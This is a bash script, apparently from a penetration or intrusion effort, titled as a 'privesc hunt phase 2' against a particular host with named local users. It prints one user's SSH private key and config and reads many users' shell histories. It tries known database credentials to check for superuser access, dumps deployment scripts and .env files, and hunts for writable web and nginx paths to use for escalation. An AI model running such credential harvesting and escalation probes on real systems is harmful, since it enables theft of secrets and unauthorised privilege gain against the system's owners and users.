#!/bin/bash
# READ-ONLY privesc hunt phase 2 on host B
echo "===== [P1] npontucontrl SSH private key + config ====="
echo "--- id_rsa (full) ---"
cat /home/npontucontrl/.ssh/id_rsa 2>/dev/null
echo "--- ssh config ---"
cat /home/npontucontrl/.ssh/config 2>/dev/null
echo "--- known_hosts ---"
cat /home/npontucontrl/.ssh/known_hosts 2>/dev/null
echo "--- authorized_keys (who else can log in as npontucontrl) ---"
cat /home/npontucontrl/.ssh/authorized_keys 2>/dev/null

echo ""
echo "===== [P2] readable bash_history of privileged-ish users ====="
for u in mylar nosa kelvin kobeng jones john daniel david deployer prince evans achabs chuks eaidoo executiveuser joseph backup_user; do
  hu="/home/$u/.bash_history"
  if [ -r "$hu" ]; then
    echo "=== $hu ($(wc -l <"$hu" 2>/dev/null) lines) ==="
    cat "$hu" 2>/dev/null | tail -80
    echo ""
  fi
done

echo ""
echo "===== [P3] cleanweb.service (recently modified unit) ====="
ls -la /etc/systemd/system/cleanweb.service 2>/dev/null
cat /etc/systemd/system/cleanweb.service 2>/dev/null
echo "--- target binary/script it runs ---"
systemctl cat cleanweb.service 2>/dev/null

echo ""
echo "===== [P4] local PG access probe (known client creds -> is any superuser?) ====="
echo "--- pg_hba readable? ---"
ls -la /var/lib/pgsql/data/pg_hba.conf /var/lib/pgsql/*/data/pg_hba.conf 2>/dev/null
find /var/lib/pgsql -name pg_hba.conf 2>/dev/null | head -3
echo "--- postgres version + data dir ---"
ps aux 2>/dev/null | grep -E "postgres.*-D|postmaster" | grep -v grep | head -3
echo "--- try known client creds via psql (itc_user, ghib_001) rolinfo ---"
which psql 2>/dev/null
for cred in "itc_user:itc_user" "ghib_001:ghib_001"; do
  u="${cred%%:*}"; echo "### try $u (rolsuper?)"
  PGPASSWORD="${cred##*:}" psql -h 127.0.0.1 -p 5432 -U "$u" -d postgres -tAc "SELECT rolname,rolsuper,rolcreatedb FROM pg_roles WHERE rolname=current_user;" 2>&1 | head -3
done

echo ""
echo "===== [P5] interesting home dirs readable (deployer, backup_user) ====="
ls -la /home/deployer/ 2>/dev/null
ls -la /home/backup_user/ 2>/dev/null
find /home/deployer /home/backup_user -maxdepth 2 -type f 2>/dev/null | head -30
echo "--- deployer scripts content ---"
find /home/deployer -maxdepth 2 -name "*.sh" -o -maxdepth 2 -name "*.yml" -o -maxdepth 2 -name "*.env" 2>/dev/null | head -10 | while read f; do
  echo "### $f"; head -40 "$f" 2>/dev/null
done

echo ""
echo "===== [P6] writable dirs owned by npontucontrl (potential privesc via cron/root process) ====="
find /var/www/html -maxdepth 1 -user npontucontrl 2>/dev/null | head -10
echo "--- nginx/apache config writable? ---"
ls -la /etc/nginx/conf.d/ 2>/dev/null | head -10
find /etc/nginx -writable 2>/dev/null | head -5

echo ""
echo "===== [P7] php-fpm pool users (web -> which user runs what) ====="
ls -la /etc/php-fpm.d/ 2>/dev/null
grep -rE "^user|^group|listen" /etc/php-fpm.d/*.conf 2>/dev/null | head -20

echo ""
echo "===== PRIVESC PHASE2 COMPLETE ====="
